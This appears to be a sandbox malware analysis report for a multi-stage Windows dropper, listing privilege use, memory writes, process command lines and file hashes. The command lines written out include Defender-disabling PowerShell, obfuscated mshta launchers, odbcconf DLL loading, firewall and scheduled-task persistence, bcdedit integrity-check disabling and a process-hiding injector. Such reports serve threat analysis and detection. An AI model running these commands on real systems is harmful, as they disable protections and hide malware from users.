N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10d7483856.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10799545d143108.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3060 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2060 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe
PID 2848 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe

"C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a0affb29d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10b607271059cb7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10fa57e769925f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed103b2f384c2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10d7483856.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1095e8d3cef4ec773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1001440e7e09.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed109189c07b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10eb606bd1d021d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a80f141fb08.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10799545d143108.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10520e75c2eb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe

Wed10a0affb29d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe

Wed10eb606bd1d021d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10799545d143108.exe

Wed10799545d143108.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe

Wed10b607271059cb7.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe

Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe

Wed1001440e7e09.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10d7483856.exe

Wed10d7483856.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe

Wed103b2f384c2a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe

Wed10fa57e769925f6.exe

C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp" /SL5="$70126,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe

Wed101f2195049.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe

Wed10520e75c2eb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a80f141fb08.exe

Wed10a80f141fb08.exe

C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp" /SL5="$60122,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe" -u

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe

Wed1095e8d3cef4ec773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCRiPT: CloSe ( CREaTeObjEcT ( "WsCrIPT.sheLl"). rUN ( "C:\Windows\system32\cmd.exe /q /c COPy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe"" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if """" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe"" ) do taskkill -Im ""%~nxJ"" /f " , 0 , TRue ) )

C:\Users\Admin\AppData\Local\Temp\is-J39I9.tmp\Wed101f2195049.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J39I9.tmp\Wed101f2195049.tmp" /SL5="$301D4,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe"

C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp" /SL5="$401EE,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c COPy /y "C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if "" == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe" ) do taskkill -Im "%~nxJ" /f

C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE

..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Wed10520e75c2eb.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCRiPT: CloSe ( CREaTeObjEcT ( "WsCrIPT.sheLl"). rUN ( "C:\Windows\system32\cmd.exe /q /c COPy /y ""C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE"" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if ""/p0HZ0v12j8OSomYiesvSh7Gq "" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE"" ) do taskkill -Im ""%~nxJ"" /f " , 0 , TRue ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c COPy /y "C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if "/p0HZ0v12j8OSomYiesvSh7Gq " == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE" ) do taskkill -Im "%~nxJ" /f

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRipT: clOSE ( CreAteObjEcT ( "WscRIpT.shell" ). ruN ( "CMD.eXe /R Echo | SET /p = ""MZ"" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A { rEgsvR ..\GOwX.SHv } & DEL /Q * ", 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R Echo | SET /p = "MZ" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A {rEgsvR ..\GOwX.SHv } & DEL /Q *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>b01RrZ3N.ZT"

C:\Windows\SysWOW64\odbcconf.exe

odbcconf /A {rEgsvR ..\GOwX.SHv }

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241107052124.log C:\Windows\Logs\CBS\CbsPersist_20241107052124.cab

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe"

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 1676

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network


Files


memory/496-168-0x0000000001000000-0x0000000001008000-memory.dmp

memory/2632-172-0x0000000000FE0000-0x0000000001022000-memory.dmp

memory/1792-174-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2632-186-0x0000000000350000-0x0000000000356000-memory.dmp

memory/2904-189-0x0000000000DA0000-0x0000000000E08000-memory.dmp

memory/2632-194-0x00000000003E0000-0x0000000000410000-memory.dmp

memory/2960-188-0x0000000000F40000-0x0000000000FA8000-memory.dmp

memory/1836-187-0x0000000000400000-0x000000000042C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-I8UI7.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2632-199-0x0000000000480000-0x0000000000486000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/448-198-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GTV9T.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/408-210-0x0000000002500000-0x00000000027DD000-memory.dmp

memory/408-211-0x0000000002C30000-0x0000000002CDD000-memory.dmp

memory/408-215-0x0000000000C80000-0x0000000000D1A000-memory.dmp

memory/408-213-0x0000000000C80000-0x0000000000D1A000-memory.dmp

